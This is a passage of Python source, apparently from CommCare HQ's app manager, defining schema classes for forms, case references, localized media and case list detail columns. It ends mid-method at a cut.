class CaseSaveReference(DocumentSchema):
"""
This is the schema for what Vellum writes to HQ and what is expected to be stored on the
model (reference by a dict where the keys are paths).
"""
_allow_dynamic_properties = False
case_type = StringProperty()
properties = ListProperty(six.text_type)
create = BooleanProperty(default=False)
close = BooleanProperty(default=False)
class CaseSaveReferenceWithPath(CaseSaveReference):
"""
Like CaseLoadReference, this is the model that is expected to be worked with as it
contains the complete information about the reference in a single place.
"""
path = StringProperty()
class CaseReferences(DocumentSchema):
"""
The case references associated with a form. This is dependent on Vellum's API that sends
case references to HQ.
load: is a dict of question paths to lists of properties (see `CaseLoadReference`),
save: is a dict of question paths to `CaseSaveReference` objects.
The intention is that all usage of the objects goes through the `get_load_references` and
`get_save_references` helper functions.
"""
_allow_dynamic_properties = False
load = DictProperty()
save = SchemaDictProperty(CaseSaveReference)
def validate(self, required=True):
super(CaseReferences, self).validate()
# call this method to force validation to run on the other referenced types
# since load is not a defined schema (yet)
list(self.get_load_references())
def get_load_references(self):
"""
Returns a generator of `CaseLoadReference` objects containing all the load references.
"""
for path, properties in self.load.items():
yield CaseLoadReference(path=path, properties=list(properties))
def get_save_references(self):
"""
Returns a generator of `CaseSaveReferenceWithPath` objects containing all the save references.
"""
for path, reference in self.save.items():
ref_copy = reference.to_json()
ref_copy['path'] = path
yield CaseSaveReferenceWithPath.wrap(ref_copy)
class FormBase(DocumentSchema):
"""
Part of a Managed Application; configuration for a form.
Translates to a second-level menu on the phone
"""
form_type = None
name = DictProperty(six.text_type)
unique_id = StringProperty()
show_count = BooleanProperty(default=False)
xmlns = StringProperty()
version = IntegerProperty()
source = FormSource()
validation_cache = CachedStringProperty(
lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
)
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=ALL_WORKFLOWS
)
post_form_workflow_fallback = StringProperty(
choices=WORKFLOW_FALLBACK_OPTIONS,
default=None,
)
auto_gps_capture = BooleanProperty(default=False)
no_vellum = BooleanProperty(default=False)
form_links = SchemaListProperty(FormLink)
schedule_form_id = StringProperty()
custom_assertions = SchemaListProperty(CustomAssertion)
custom_instances = SchemaListProperty(CustomInstance)
case_references_data = SchemaProperty(CaseReferences)
is_release_notes_form = BooleanProperty(default=False)
enable_release_notes = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
data.pop('validation_cache', '')
if cls is FormBase:
doc_type = data['doc_type']
if doc_type == 'Form':
return Form.wrap(data)
elif doc_type == 'AdvancedForm':
return AdvancedForm.wrap(data)
elif doc_type == 'ShadowForm':
return ShadowForm.wrap(data)
else:
raise ValueError('Unexpected doc_type for Form', doc_type)
else:
return super(FormBase, cls).wrap(data)
@property
def case_references(self):
return self.case_references_data or CaseReferences()
def requires_case(self):
return False
def get_action_type(self):
return ''
def get_validation_cache(self):
return self.validation_cache
def set_validation_cache(self, cache):
self.validation_cache = cache
def clear_validation_cache(self):
self.set_validation_cache(None)
@property
def validator(self):
return FormBaseValidator(self)
def is_allowed_to_be_release_notes_form(self):
# checks if this form can be marked as a release_notes form
# based on whether it belongs to a training_module
# and if no other form is already marked as release_notes form
module = self.get_module()
if not module or not module.is_training_module:
return False
forms = module.get_forms()
for form in forms:
if form.is_release_notes_form and form.unique_id != self.unique_id:
return False
return True
@property
def uses_cases(self):
return (
self.requires_case()
or self.get_action_type() != 'none'
or self.form_type == 'advanced_form'
)
@case_references.setter
def case_references(self, case_references):
self.case_references_data = case_references
@classmethod
def get_form(cls, form_unique_id, and_app=False):
try:
d = Application.get_db().view(
'app_manager/xforms_index',
key=form_unique_id
).one()
except MultipleResultsFound as e:
raise XFormIdNotUnique(
"xform id '%s' not unique: %s" % (form_unique_id, e)
)
if d:
d = d['value']
else:
raise ResourceNotFound()
# unpack the dict into variables app_id, module_id, form_id
app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
app = Application.get(app_id)
form = app.get_form(unique_id)
if and_app:
return form, app
else:
return form
def pre_delete_hook(self):
raise NotImplementedError()
def pre_move_hook(self, from_module, to_module):
""" Called before a form is moved between modules or to a different position """
raise NotImplementedError()
def wrapped_xform(self):
return XForm(self.source)
def validate_form(self):
vc = self.get_validation_cache()
if vc is None:
# todo: now that we don't use formtranslate, does this still apply?
# formtranslate requires all attributes to be valid xpaths, but
# vellum namespaced attributes aren't
form = self.wrapped_xform()
form.strip_vellum_ns_attributes()
try:
if form.xml is not None:
validate_xform(self.get_app().domain, etree.tostring(form.xml))
except XFormValidationError as e:
validation_dict = {
"fatal_error": e.fatal_error,
"validation_problems": e.validation_problems,
"version": e.version,
}
vc = json.dumps(validation_dict)
else:
vc = ""
self.set_validation_cache(vc)
if vc:
try:
raise XFormValidationError(**json.loads(vc))
except ValueError:
self.clear_validation_cache()
return self.validate_form()
return self
def is_a_disabled_release_form(self):
return self.is_release_notes_form and not self.enable_release_notes
@property
def timing_context(self):
return self.get_app().timing_context
def validate_for_build(self, validate_module=True):
return self.validator.validate_for_build(validate_module)
def get_unique_id(self):
"""
Return unique_id if it exists, otherwise initialize it
Does _not_ force a save, so it's the caller's responsibility to save the app
"""
if not self.unique_id:
self.unique_id = uuid.uuid4().hex
return self.unique_id
def get_app(self):
return self._app
def get_version(self):
return self.version if self.version else self.get_app().version
def add_stuff_to_xform(self, xform, build_profile_id=None):
app = self.get_app()
langs = app.get_build_langs(build_profile_id)
xform.exclude_languages(langs)
xform.set_default_language(langs[0])
xform.normalize_itext()
xform.strip_vellum_ns_attributes()
xform.set_version(self.get_version())
xform.add_missing_instances(app.domain)
def render_xform(self, build_profile_id=None):
xform = XForm(self.source)
self.add_stuff_to_xform(xform, build_profile_id)
return xform.render()
def cached_get_questions(self):
"""
Call to get_questions with a superset of necessary information, so
it can hit the same cache across common app-building workflows
"""
# it is important that this is called with the same params every time
return self.get_questions([], include_triggers=True, include_groups=True)
@time_method()
@quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'],
timeout=24 * 60 * 60)
def get_questions(self, langs, include_triggers=False,
include_groups=False, include_translations=False):
try:
return XForm(self.source).get_questions(
langs=langs,
include_triggers=include_triggers,
include_groups=include_groups,
include_translations=include_translations,
)
except XFormException as e:
raise XFormException(_('Error in form "{}": {}')
.format(trans(self.name), six.text_type(e)))
@memoized
def get_case_property_name_formatter(self):
"""Get a function that formats case property names
The returned function requires two arguments
`(case_property_name, data_path)` and returns a string.
"""
valid_paths = {}
if toggles.MM_CASE_PROPERTIES.enabled(self.get_app().domain):
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[])}
except XFormException:
# punt on invalid xml (sorry, no rich attachments)
valid_paths = {}
def format_key(key, path):
if valid_paths.get(path) == "upload":
return "{}{}".format(ATTACHMENT_PREFIX, key)
return key
return format_key
def export_json(self, dump_json=True):
source = self.to_json()
del source['unique_id']
return json.dumps(source) if dump_json else source
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
try:
self.rename_xform_language(old_lang, new_lang)
except XFormException:
pass
def rename_xform_language(self, old_code, new_code):
source = XForm(self.source)
if source.exists():
source.rename_language(old_code, new_code)
self.source = source.render().decode('utf-8')
def default_name(self):
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
@property
def full_path_name(self):
return "%(app_name)s > %(module_name)s > %(form_name)s" % {
'app_name': self.get_app().name,
'module_name': self.get_module().default_name(),
'form_name': self.default_name()
}
@property
def has_fixtures(self):
return 'src="jr://fixture/item-list:' in self.source
def get_auto_gps_capture(self):
app = self.get_app()
if app.build_version and app.enable_auto_gps:
return self.auto_gps_capture or app.auto_gps_capture
else:
return False
def is_registration_form(self, case_type=None):
"""
Should return True if this form passes the following tests:
* does not require a case
* registers a case of type 'case_type' if supplied
"""
raise NotImplementedError()
def uses_usercase(self):
raise NotImplementedError()
def update_app_case_meta(self, app_case_meta):
pass
@property
@memoized
def case_list_modules(self):
case_list_modules = [
mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
]
return case_list_modules
@property
def is_case_list_form(self):
return bool(self.case_list_modules)
def get_save_to_case_updates(self):
"""
Get a flat list of case property names from save to case questions
"""
updates_by_case_type = defaultdict(set)
for save_to_case_update in self.case_references_data.get_save_references():
case_type = save_to_case_update.case_type
updates_by_case_type[case_type].update(save_to_case_update.properties)
return updates_by_case_type
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
def get_app(self):
return self._parent._parent
def get_module(self):
return self._parent
def get_case_type(self):
return self._parent.case_type
@property
def validator(self):
return IndexedFormBaseValidator(self)
def _add_save_to_case_questions(self, form_questions, app_case_meta):
def _make_save_to_case_question(path):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
# todo: this is a hack - just make an approximate save-to-case looking question
return FormQuestionResponse.wrap({
"label": path,
"tag": path,
"value": path,
"repeat": None,
"group": None,
"type": 'SaveToCase',
"relevant": None,
"required": None,
"comment": None,
"hashtagValue": path,
})
def _make_dummy_condition():
# todo: eventually would be nice to support proper relevancy conditions here but that's a ways off
return FormActionCondition(type='always')
for property_info in self.case_references_data.get_save_references():
if property_info.case_type:
type_meta = app_case_meta.get_type(property_info.case_type)
for property_name in property_info.properties:
app_case_meta.add_property_save(
property_info.case_type,
property_name,
self.unique_id,
_make_save_to_case_question(property_info.path),
None
)
if property_info.create:
type_meta.add_opener(self.unique_id, _make_dummy_condition())
if property_info.close:
type_meta.add_closer(self.unique_id, _make_dummy_condition())
def add_property_save(self, app_case_meta, case_type, name,
questions, question_path, condition=None):
if question_path in questions:
app_case_meta.add_property_save(
case_type,
name,
self.unique_id,
questions[question_path],
condition
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
def add_property_load(self, app_case_meta, case_type, name,
questions, question_path):
if question_path in questions:
app_case_meta.add_property_load(
case_type,
name,
self.unique_id,
questions[question_path]
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
def get_all_case_updates(self):
"""
Collate contributed case updates from all sources within the form
Subclass must have helper methods defined:
- get_case_updates
- get_all_contributed_subcase_properties
- get_save_to_case_updates
:return: collated {<case_type>: set([<property>])}
"""
updates_by_case_type = defaultdict(set)
for case_type, updates in self.get_case_updates().items():
updates_by_case_type[case_type].update(updates)
for case_type, updates in self.get_all_contributed_subcase_properties().items():
updates_by_case_type[case_type].update(updates)
for case_type, updates in self.get_save_to_case_updates().items():
updates_by_case_type[case_type].update(updates)
return updates_by_case_type
def get_case_updates_for_case_type(self, case_type):
"""
Like get_case_updates filtered by a single case type
subclass must implement `get_case_updates`
"""
return self.get_case_updates().get(case_type, [])
class JRResourceProperty(StringProperty):
def validate(self, value, required=True):
super(JRResourceProperty, self).validate(value, required)
if value is not None and not value.startswith('jr://'):
raise BadValueError("JR Resources must start with 'jr://': {!r}".format(value))
return value
class CustomIcon(DocumentSchema):
"""
A custom icon to display next to a module or a form.
The property "form" identifies what kind of icon this would be, for ex: badge
One can set either a simple text to display or
an xpath expression to be evaluated for example count of cases within.
"""
form = StringProperty()
text = DictProperty(six.text_type)
xpath = StringProperty()
class NavMenuItemMediaMixin(DocumentSchema):
"""
Language-specific icon and audio.
Properties are map of lang-code to filepath
"""
# These were originally DictProperty(JRResourceProperty),
# but jsonobject<0.9.0 didn't properly support passing in a property to a container type
# so it was actually wrapping as a StringPropery
# too late to retroactively apply that validation,
# so now these are DictProperty(StringProperty)
media_image = DictProperty(StringProperty)
media_audio = DictProperty(StringProperty)
custom_icons = ListProperty(CustomIcon)
# When set to true, all languages use the specific media from the default language
use_default_image_for_all = BooleanProperty(default=False)
use_default_audio_for_all = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
# Lazy migration from single-language media to localizable media
for media_attr in ('media_image', 'media_audio'):
old_media = data.get(media_attr, None)
if old_media:
# Single-language media was stored in a plain string.
# Convert this to a dict, using a dummy key because we
# don't know the app's supported or default lang yet.
if isinstance(old_media, six.string_types):
soft_assert_type_text(old_media)
new_media = {'default': old_media}
data[media_attr] = new_media
elif isinstance(old_media, dict):
# Once the media has localized data, discard the dummy key
if 'default' in old_media and len(old_media) > 1:
old_media.pop('default')
return super(NavMenuItemMediaMixin, cls).wrap(data)
def get_app(self):
raise NotImplementedError
def _get_media_by_language(self, media_attr, lang, strict=False):
"""
Return media-path for given language if one exists, else 1st path in the
sorted lang->media-path list
*args:
media_attr: one of 'media_image' or 'media_audio'
lang: language code
**kwargs:
strict: whether to return None if media-path is not set for lang or
to return first path in sorted lang->media-path list
"""
assert media_attr in ('media_image', 'media_audio')
app = self.get_app()
if ((self.use_default_image_for_all and media_attr == 'media_image')
or (self.use_default_audio_for_all and media_attr == 'media_audio')):
lang = app.default_language
media_dict = getattr(self, media_attr)
if not media_dict:
return None
if media_dict.get(lang, ''):
return media_dict[lang]
if not strict:
# if the queried lang key doesn't exist,
# return the first in the sorted list
for lang, item in sorted(media_dict.items()):
return item
@property
def default_media_image(self):
# For older apps that were migrated: just return the first available item
self._assert_unexpected_default_media_call('media_image')
return self.icon_by_language('')
@property
def default_media_audio(self):
# For older apps that were migrated: just return the first available item
self._assert_unexpected_default_media_call('media_audio')
return self.audio_by_language('')
def _assert_unexpected_default_media_call(self, media_attr):
assert media_attr in ('media_image', 'media_audio')
media = getattr(self, media_attr)
if isinstance(media, dict) and list(media) == ['default']:
from corehq.util.view_utils import get_request
request = get_request()
url = ''
if request:
url = request.META.get('HTTP_REFERER')
_assert = soft_assert(['jschweers' + '@' + 'dimagi.com'])
_assert(False, 'Called default_media_image on app with localized media: {}'.format(url))
def icon_by_language(self, lang, strict=False):
return self._get_media_by_language('media_image', lang, strict=strict)
def audio_by_language(self, lang, strict=False):
return self._get_media_by_language('media_audio', lang, strict=strict)
def custom_icon_form_and_text_by_language(self, lang):
custom_icon = self.custom_icon
if custom_icon:
custom_icon_text = custom_icon.text.get(lang, custom_icon.text.get(self.get_app().default_language))
return custom_icon.form, custom_icon_text
return None, None
def _set_media(self, media_attr, lang, media_path):
"""
Caller's responsibility to save doc.
Currently only called from the view which saves after all Edits
"""
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
old_value = media_dict.get(lang)
media_dict[lang] = media_path or ''
setattr(self, media_attr, media_dict)
# remove the entry from app multimedia mappings if media is being removed now
# This does not remove the multimedia but just it's reference in mapping
# Added it here to ensure it's always set instead of getting it only when needed
app = self.get_app()
if old_value and not media_path:
# expire all_media_paths before checking for media path used in Application
app.all_media.reset_cache(app)
app.all_media_paths.reset_cache(app)
if old_value not in app.all_media_paths():
app.multimedia_map.pop(old_value, None)
def set_icon(self, lang, icon_path):
self._set_media('media_image', lang, icon_path)
def set_audio(self, lang, audio_path):
self._set_media('media_audio', lang, audio_path)
def _all_media_paths(self, media_attr, lang=None):
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
valid_media_paths = set()
for key, value in media_dict.items():
if value and (lang is None or key == lang):
valid_media_paths.add(value)
return valid_media_paths
def all_image_paths(self, lang=None):
return self._all_media_paths('media_image', lang=lang)
def all_audio_paths(self, lang=None):
return self._all_media_paths('media_audio', lang=lang)
def icon_app_string(self, lang, for_default=False):
"""
Return lang/app_strings.txt translation for given lang
if a path exists for the lang
**kwargs:
for_default: whether app_string is for default/app_strings.txt
"""
if not for_default and self.icon_by_language(lang, strict=True):
return self.icon_by_language(lang, strict=True)
if for_default:
return self.icon_by_language(lang, strict=False)
def audio_app_string(self, lang, for_default=False):
"""
see note on self.icon_app_string
"""
if not for_default and self.audio_by_language(lang, strict=True):
return self.audio_by_language(lang, strict=True)
if for_default:
return self.audio_by_language(lang, strict=False)
@property
def custom_icon(self):
if self.custom_icons:
return self.custom_icons[0]
class Form(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
form_type = 'module_form'
form_filter = StringProperty()
requires = StringProperty(choices=["case", "referral", "none"], default="none")
actions = SchemaProperty(FormActions)
@classmethod
def wrap(cls, data):
# rare schema bug: http://manage.dimagi.com/default.asp?239236
if data.get('case_references') == []:
del data['case_references']
return super(Form, cls).wrap(data)
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(Form, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta(self)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def session_var_for_action(self, action):
module_case_type = self.get_module().case_type
if action == 'open_case':
return 'case_id_new_{}_0'.format(module_case_type)
if isinstance(action, OpenSubCaseAction):
subcase_type = action.case_type
subcase_index = self.actions.subcases.index(action)
opens_case = 'open_case' in self.active_actions()
if opens_case:
subcase_index += 1
return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)
def _get_active_actions(self, types):
actions = {}
for action_type in types:
getter = 'get_{}'.format(action_type)
if hasattr(self.actions, getter):
# user getter if there is one
a = list(getattr(self.actions, getter)())
else:
a = getattr(self.actions, action_type)
if isinstance(a, list):
if a:
actions[action_type] = a
elif a.is_active():
actions[action_type] = a
return actions
@memoized
def get_action_type(self):
if self.actions.close_case.condition.is_active():
return 'close'
elif (self.actions.open_case.condition.is_active() or
self.actions.subcases):
return 'open'
elif self.actions.update_case.condition.is_active():
return 'update'
else:
return 'none'
@memoized
def get_icon_help_text(self):
messages = []
if self.actions.open_case.condition.is_active():
messages.append(_('This form opens a {}').format(self.get_module().case_type))
if self.actions.subcases:
messages.append(_('This form opens a subcase {}').format(', '.join(self.get_subcase_types())))
if self.actions.close_case.condition.is_active():
messages.append(_('This form closes a {}').format(self.get_module().case_type))
elif self.requires_case():
messages.append(_('This form updates a {}').format(self.get_module().case_type))
return '. '.join(messages)
def active_actions(self):
self.get_app().assert_app_v2()
if self.requires == 'none':
action_types = (
'open_case', 'update_case', 'close_case', 'subcases',
'usercase_update', 'usercase_preload',
)
elif self.requires == 'case':
action_types = (
'update_case', 'close_case', 'case_preload', 'subcases',
'usercase_update', 'usercase_preload', 'load_from_form',
)
else:
# this is left around for legacy migrated apps
action_types = (
'open_case', 'update_case', 'close_case',
'case_preload', 'subcases',
'usercase_update', 'usercase_preload',
)
return self._get_active_actions(action_types)
def active_non_preloader_actions(self):
return self._get_active_actions((
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral'))
@property
def validator(self):
return FormValidator(self)
def requires_case(self):
# all referrals also require cases
return self.requires in ("case", "referral")
def requires_case_type(self):
return self.requires_case() or \
bool(self.active_non_preloader_actions())
def requires_referral(self):
return self.requires == "referral"
def uses_parent_case(self):
"""
Returns True if any of the load/update properties references the
parent case; False otherwise
"""
return any([name.startswith('parent/')
for name in self.actions.all_property_names()])
def get_registration_actions(self, case_type):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
reg_actions = []
if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
reg_actions.append('open_case')
subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
if case_type:
subcase_actions = [a for a in subcase_actions if a.case_type == case_type]
reg_actions.extend(subcase_actions)
return reg_actions
def is_registration_form(self, case_type=None):
reg_actions = self.get_registration_actions(case_type)
return len(reg_actions) == 1
def uses_usercase(self):
return actions_use_usercase(self.active_actions())
def get_case_updates(self):
# This method is used by both get_all_case_properties and
# get_usercase_properties. In the case of usercase properties, use
# the usercase_update action, and for normal cases, use the
# update_case action
case_type = self.get_module().case_type
format_key = self.get_case_property_name_formatter()
return {
case_type: {
format_key(*item) for item in self.actions.update_case.update.items()},
USERCASE_TYPE: {
format_key(*item) for item in self.actions.usercase_update.update.items()}
}
@memoized
def get_subcase_types(self):
'''
Return a list of each case type for which this Form opens a new subcase.
:return:
'''
return {subcase.case_type for subcase in self.actions.subcases
if subcase.close_condition.type == "never" and subcase.case_type}
@property
def case_references(self):
refs = self.case_references_data or CaseReferences()
if not refs.load and self.actions.load_from_form.preload:
# for backward compatibility
# preload only has one reference per question path
preload = self.actions.load_from_form.preload
refs.load = {key: [value] for key, value in six.iteritems(preload)}
return refs
@case_references.setter
def case_references(self, refs):
"""Set case references
format: {"load": {"/data/path": ["case_property", ...], ...}}
"""
self.case_references_data = refs
if self.actions.load_from_form.preload:
self.actions.load_from_form = PreloadAction()
@memoized
def get_all_contributed_subcase_properties(self):
case_properties = defaultdict(set)
for subcase in self.actions.subcases:
case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
return case_properties
@memoized
def get_contributed_case_relationships(self):
case_relationships_by_child_type = defaultdict(set)
parent_case_type = self.get_module().case_type
for subcase in self.actions.subcases:
child_case_type = subcase.case_type
if child_case_type != parent_case_type and (
self.actions.open_case.is_active() or
self.actions.update_case.is_active() or
self.actions.close_case.is_active()):
case_relationships_by_child_type[child_case_type].add(
(parent_case_type, subcase.reference_id or 'parent'))
return case_relationships_by_child_type
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_triggers=True,
include_groups=True, include_translations=True)
}
self._add_save_to_case_questions(questions, app_case_meta)
module_case_type = self.get_module().case_type
type_meta = app_case_meta.get_type(module_case_type)
for type_, action in self.active_actions().items():
if type_ == 'open_case':
type_meta.add_opener(self.unique_id, action.condition)
self.add_property_save(
app_case_meta,
module_case_type,
'name',
questions,
action.name_path
)
if type_ == 'close_case':
type_meta.add_closer(self.unique_id, action.condition)
if type_ == 'update_case' or type_ == 'usercase_update':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_save(
app_case_meta,
USERCASE_TYPE if type_ == 'usercase_update' else module_case_type,
name,
questions,
question_path
)
if type_ == 'case_preload' or type_ == 'load_from_form' or type_ == 'usercase_preload':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_load(
app_case_meta,
USERCASE_TYPE if type_ == 'usercase_preload' else module_case_type,
name,
questions,
question_path
)
if type_ == 'subcases':
for act in action:
if act.is_active():
sub_type_meta = app_case_meta.get_type(act.case_type)
sub_type_meta.add_opener(self.unique_id, act.condition)
if act.close_condition.is_active():
sub_type_meta.add_closer(self.unique_id, act.close_condition)
for name, question_path in FormAction.get_action_properties(act):
self.add_property_save(
app_case_meta,
act.case_type,
name,
questions,
question_path
)
def parse_case_type(name, types={"#case": module_case_type,
"#user": USERCASE_TYPE}):
if name.startswith("#") and "/" in name:
full_name = name
hashtag, name = name.split("/", 1)
if hashtag not in types:
hashtag, name = "#case", full_name
else:
hashtag = "#case"
return types[hashtag], name
def parse_relationship(name):
if '/' not in name:
return name
relationship, property_name = name.split('/', 1)
if relationship == 'grandparent':
relationship = 'parent/parent'
return '/'.join([relationship, property_name])
for case_load_reference in self.case_references.get_load_references():
for name in case_load_reference.properties:
case_type, name = parse_case_type(name)
name = parse_relationship(name)
self.add_property_load(
app_case_meta,
case_type,
name,
questions,
case_load_reference.path
)
class MappingItem(DocumentSchema):
key = StringProperty()
# lang => localized string
value = DictProperty()
@property
def treat_as_expression(self):
"""
Returns if whether the key can be treated as a valid expression that can be included in
condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
"""
special_chars = '{}()[]=<>."\'/'
return any(special_char in self.key for special_char in special_chars)
@property
def key_as_variable(self):
"""
Return an xml variable name to represent this key.
If the key contains spaces or a condition-predicate of an if-clause,
return a hash of the key with "h" prepended.
If not, return the key with "k" prepended.
The prepended characters prevent the variable name from starting with a
numeral, which is illegal.
"""
if re.search(r'\W', self.key) or self.treat_as_expression:
return 'h{hash}'.format(hash=hashlib.md5(self.key.encode('UTF-8')).hexdigest()[:8])
else:
return 'k{key}'.format(key=self.key)
def key_as_condition(self, property):
if self.treat_as_expression:
condition = dot_interpolate(self.key, property)
return "{condition}".format(condition=condition)
else:
return "{property} = '{key}'".format(
property=property,
key=self.key
)
def ref_to_key_variable(self, index, sort_or_display):
if sort_or_display == "sort":
key_as_var = "{}, ".format(index)
elif sort_or_display == "display":
key_as_var = "${var_name}, ".format(var_name=self.key_as_variable)
return key_as_var
class GraphAnnotations(IndexedSchema):
display_text = DictProperty()
x = StringProperty()
y = StringProperty()
class GraphSeries(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
data_path = StringProperty()
x_function = StringProperty()
y_function = StringProperty()
radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
annotations = SchemaListProperty(GraphAnnotations)
graph_type = StringProperty()
series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
"""
Represents a tab in the case detail screen on the phone.
Each tab is itself a detail, nested inside the app's "main" detail.
"""
header = DictProperty()
# The first index, of all fields in the parent detail, that belongs to this tab
starting_index = IntegerProperty()
# A tab may be associated with a nodeset, resulting in a detail that
# iterates through sub-nodes of an entity rather than a single entity
has_nodeset = BooleanProperty(default=False)
nodeset = StringProperty()
relevant = StringProperty()
class DetailColumn(IndexedSchema):
"""
Represents a column in case selection screen on the phone. Ex:
{
'header': {'en': 'Sex', 'por': 'Sexo'},
'model': 'case',
'field': 'sex',
'format': 'enum',
'xpath': '.',
'enum': [
{'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
{'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
],
}
"""
header = DictProperty()
model = StringProperty()
field = StringProperty()
useXpathExpression = BooleanProperty(default=False)
format = StringProperty()
enum = SchemaListProperty(MappingItem)
graph_configuration = SchemaProperty(GraphConfiguration)
case_tile_field = StringProperty()
late_flag = IntegerProperty(default=30)
advanced = StringProperty(default="")
filter_xpath = StringProperty(default="")
time_ago_interval = FloatProperty(default=365.25)
@property
def enum_dict(self):
"""for backwards compatibility with building 1.0 apps"""
import warnings
warnings.warn('You should not use enum_dict. Use enum instead',
DeprecationWarning)
return dict((item.key, item.value) for item in self.enum)
def rename_lang(self, old_lang, new_lang):
for dct in [self.header] + [item.value for item in self.enum]:
_rename_key(dct, old_lang, new_lang)
@property
def field_type(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[0]
else:
return 'property' # equivalent to property:parent/case_property
@property
def field_property(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[1]
else:
return self.field
class TimeAgoInterval(object):
map = {
'day': 1.0,
'week': 7.0,
'month': 30.4375,
'year': 365.25
}
@classmethod
def get_from_old_format(cls, format):
if format == 'years-ago':
return cls.map['year']
elif format == 'months-ago':
return cls.map['month']
@classmethod
def wrap(cls, data):
if data.get('format') in ('months-ago', 'years-ago'):
data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
data['format'] = 'time-ago'
# Lazy migration: enum used to be a dict, now is a list
if isinstance(data.get('enum'), dict):
data['enum'] = sorted(
[{'key': key, 'value': value} for key, value in data['enum'].items()],
key=lambda d: d['key'],
)
# Lazy migration: xpath expressions from format to first-class property
if data.get('format') == 'calculate':
property_xpath = PropertyXpathGenerator(None, None, None, super(DetailColumn, cls).wrap(data)).xpath
data['field'] = dot_interpolate(data.get('calc_xpath', '.'), property_xpath)
data['useXpathExpression'] = True
data['hasAutocomplete'] = False
data['format'] = 'plain'
return super(DetailColumn, cls).wrap(data)
@classmethod
def from_json(cls, data):
from corehq.apps.app_manager.views.media_utils import interpolate_media_path
to_ret = cls.wrap(data)
if to_ret.format == 'enum-image':
# interpolate icons-paths
for item in to_ret.enum:
for lang, path in six.iteritems(item.value):
item.value[lang] = interpolate_media_path(path)
return to_ret
@property
def invisible(self):
return self.format == 'invisible'
class SortElement(IndexedSchema):
field = StringProperty()
type = StringProperty()
direction = StringProperty()
blanks = StringProperty()
display = DictProperty()
sort_calculation = StringProperty(default="")
def has_display_values(self):
return any(s.strip() != '' for s in self.display.values())
class CaseListLookupMixin(DocumentSchema):
"""
Allows for the addition of Android Callouts to do lookups from the CaseList
<lookup action="" image="" name="">
<extra key="" value="" />
<response key="" />
<field>
<header><text><locale id=""/></text></header>
<template><text><xpath function=""/></text></template>
</field>
</lookup>
"""
lookup_enabled = BooleanProperty(default=False)
lookup_autolaunch = BooleanProperty(default=False)
lookup_action = StringProperty()
lookup_name = StringProperty()
lookup_image = JRResourceProperty(required=False)
lookup_extras = SchemaListProperty()
lookup_responses = SchemaListProperty()
lookup_display_results = BooleanProperty(default=False) # Display callout results in case list?
lookup_field_header = DictProperty()
lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
"""
Full configuration for a case selection screen
"""
display = StringProperty(choices=['short', 'long'])
columns = SchemaListProperty(DetailColumn)
get_columns = IndexedSchema.Getter('columns')
tabs = SchemaListProperty(DetailTab)
get_tabs = IndexedSchema.Getter('tabs')
sort_elements = SchemaListProperty(SortElement)
sort_nodeset_columns = BooleanProperty()
filter = StringProperty()
# If True, a small tile will display the case name after selection.
persist_case_context = BooleanProperty()
persistent_case_context_xml = StringProperty(default='case_name')
# Custom variables to add into the <variables /> node
custom_variables = StringProperty()
# If True, use case tiles in the case list
use_case_tiles = BooleanProperty()
# If given, use this string for the case tile markup instead of the default temaplte
custom_xml = StringProperty()
persist_tile_on_forms = BooleanProperty()
# use case tile context persisted over forms from another module
persistent_case_tile_from_module = StringProperty()
# If True, the in form tile can be pulled down to reveal all the case details.
pull_down_tile = BooleanProperty()
print_template = DictProperty()
def get_tab_spans(self):
'''
Return the starting and ending indices into self.columns deliminating
the columns that should be in each tab.
:return:
'''
tabs = list(self.get_tabs())
ret = []
for tab in tabs:
try:
end = tabs[tab.id + 1].starting_index
except IndexError:
end = len(self.columns)
ret.append((tab.starting_index, end))
return ret
@parse_int([1])
def get_column(self, i):
return self.columns[i].with_id(i % len(self.columns), self)
def rename_lang(self, old_lang, new_lang):
for column in self.columns:
